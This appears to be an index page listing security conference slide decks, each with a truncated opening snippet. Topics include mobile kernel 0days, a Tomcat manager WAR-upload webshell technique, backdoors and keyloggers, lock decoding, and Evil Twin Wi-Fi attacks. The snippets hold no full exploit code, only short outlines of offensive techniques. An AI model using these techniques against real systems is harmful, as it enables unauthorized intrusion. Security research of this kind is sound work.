1 Adam Donenfeld STUMPING THE MOBILE CHIPSET New 0days from down under AGENDA • Android chipsets overview in ecosystem • Qualcomm chipset subsystem’s overview • New kernel vulnerabilities • Exploitation of a new kernel vulnerability • Conclusions ~ $ man Adam ADAM DONENFELD • Years of experience in researc...
pdf
Tomcat JMXProxy RCE 0x00 前言 在介绍该漏洞之前有必要先进行一些说明 (1)不影响默认配置的 Tomcat (2)不影响 SpringBoot 只影响通过 war 部署的项目 (3)该漏洞为利用链中的一环,配合第三方平台未授权访问或弱口令可以直接利用 既然官方不认,那我直接公开了 0x01 Manager Tomcat 一直存在一个不是“漏洞”的漏洞: Tomcat Manager 导致上传 war 解压生成 webshell 的 RCE 在 tomcat/conf/tomcat-users.xml 配置 访问 /manager/html 输入用户名和密码,即可在里面上传 war 进行部署 <user use...
pdf
University of California, Santa Barbara HITCON Enterprise August 27th, 2015 A Dozen Years of Shellphish From DEFCON to the Cyber Grand Challenge Antonio Bianchi antoniob@cs.ucsb.edu 3 A Dozen Years of Shellphish – from DEFCON to the Cyber Grand Challenge Agenda ● Shellphish ● The DARPA Cyber Grand Challenge ● Shellph...
pdf
Who am I? • Seth Fogie, VP Airscanner • Airscanner Mobile Security – Mobile AntiVirus – Mobile Encrypter – and more coming… • Author – Security Warrior – Maximum Wireless Security – InformIT.com Security Section Overview • Basic Security Issues • Conceal A Backdoor Wizard • Keyboard Logger • Reverse Engineering Overvie...
pdf
Key Decoding and Duplication Attacks for the Schlage Primus High-Security Lock David Lawrence Eric Van Albert Robert Johnson locks@mit.edu DEF CON 21 August 3, 2013 dlaw, ervanalb, robj (DEF CON 21) Attacking the Schlage Primus August 3, 2013 1 / 31 Standard pin-tumbler locks Photo credit: user pbroks13 on Wikimedia Co...
pdf
Today’s Modern Network Killing Robot Viki Navratilova viki@uchicago.edu Network Security Officer The University of Chicago How to Create a Network Killing Robot  Slap together different technologies – Borrow from the strengths of each  Make it easy for lots of people to use (AOL effect) – Means giving up ‘I am an ...
pdf
Zidong Han Bridge Attack —Double-edged Sword in MobileSec Self Introduction l  Mobile Security researcher -Tencent Mobile Security Labs Razor Team l  Focuses on App vulnerability and IOT related security l  GeekPwn 2018 winner in “Hacker Pwn in House” l  HITB-SECCONF-2018-Beijing Agenda Ø  What is Bri...
pdf
• 什么是入侵攻击模拟 • 要解决的问题 • 存在的挑战 • 入侵攻击模拟演练 • 机制简介 • 突破入口模拟 • 防御水位衡量 • 模拟演练机制简介 • 检测/响应水位衡量 • 其他业务场景落地 • 企业采用多种安全措施,每一种都可能因 配置错误/运营问题失效,且难以察觉 • 如仅依靠蓝军或外采渗透测试,案例数量 较少、时间上不连续、可能遗漏、成本高 • 安全水位无法量化,建设效果难以衡量 • 从攻击者视角对企业基础设施进行持续的自动化安全测试 • 针对安全措施失效、蓝军成本高的问题 • 定义模型量化当前安全水位,发现问题,反哺防御检测能力 • ->解决无法量化的问题 • 2017年,Gartner将入侵攻击模拟技术(BAS)列为...
pdf
We are Here to Help: How FIPS 140 Helps (and Hurts) Security Agenda ● Who Am I? ● Background ● What is FIPS 140? ● How the validation process works ● Look at the Requirements ● Best/Worst of the Requirements ● What does the future hold? ● Closing/Q&A Who is l0stkn0wledge? ● Work directly with FIPS 140 ● Over five years...
pdf
程聪 阿里云安全-系统安全专家 基 于 硬 件 虚 拟 化 技 术 的 新 一 代 二 进 制 分 析 利 器 自我介绍 现就职于阿里云安全-系统安全团队 主要研究方向: • 病毒检测 • 主机安全 • 内核安全 • 虚拟化安全 • 二进制攻防 演讲内容 • 背景介绍 • QEMU/KVM简介 • 无影子页ept hook • 虚拟化调试器 • 内核级trace • 总结 背景介绍 大家先来看下左边这张图片,搞内核安全的应该不陌 生。windows x64内核引入patchguard后,对内核 敏感部分,进行patch、hook,修改msr、IDT表等 操作,都会触发蓝屏 从PatchGuard谈起 但是有很多场景还是需要对内核进行...
pdf
unixsocket 0x00 httpburphttptcptcptcpdump tcp sslvpnunixsocket unixsocket 0x01 unix socket unix socketsockettcpudpunixsocketsocket unixsocketsocket tcpsocketunixsocket unixsocket netstatunixsocket webunixsocket netstat netstat -alnp unixsocketunixsocket 0x02 #!/bin/bash #!/bin/bash # Parameters socket="/run/foo.s...
pdf
Vendor Name PART NUMBER DESCRIPTION QTY. Price(USD) Total Price(USD) Total Weight ABS (Grams) McMaster-Carr 4687T110 Thick-Wall Dark Gray PVC Threaded Pipe 1/4 Pipe Size X 2' Length, Threaded Ends 1 10.01 10.01 0 McMaster-Carr 8585K11 Impact-Resistant Polycarbonate Round Tube 3/8" OD, 1/4" ID, Clear 2 0.77 1.54 0 McMas...
pdf
-[ Past and Future in OS X Malware ]- 1 Who Am I §  An Economist and MBA. §  Computer enthusiast for the past 30 years. §  Someone who worked at one of the world’s best ATM networks, the Portuguese Multibanco. §  A natural-born reverser and assembler of all kinds of things, not just bits & bytes. 2 Who’s no...
pdf
MTVEC CORRUPTION FOR HARDENING ISA Adam 'pi3' Zabrocki Twitter: @Adam_pi3 GLITCHING RISC-V CHIPS: Alex Matrosov Twitter: @matrosov /USR/BIN/WHOWEARE Adam ‘pi3’ Zabrocki: 2 • Phrack author • Bughunter (Hyper-V, Intel/NVIDIA vGPU, Linux kernel, OpenSSH, Apache, gcc SSP / ProPolice, Apache, xpdf, more…) – CVEs • The ER...
pdf
Improving Web Vulnerability Scanning Daniel Zulla 1 Introduction Hey! ■ Hi there! ■ I’m Dan. This is my first year at DEFCON. ■ I do programming and security start-ups. ■ I do some penetration testing as well 2 More Introduction ■ Today I’m going to talk about vulnerability scanning ■ Primary on the web ■ “The cloud” i...
pdf
Microsoft Edge MemGC Internals Henry Li,TrendMicro 2015/08/29 Agenda • Background • MemGC Internals • Prevent the UAF'S exploit • Weaknesses of MemGC Notes • Research is based on Windows 10 10041( edgehtml.dll, chakra.dll) • The latest windows versions( windows 10 10240) data structure there are some small changes ...
pdf
Multipot: A More Potent Variant of Evil Twin K. N. Gopinath Senior Wireless Security Researcher and Senior Engineering Manager AirTight Networks http://www.airtightnetworks.net Email: gopinath.kn@airtightnetworks.net What is this presentation about? It is about discovery of a more potent variant of Evil Twin. We...
pdf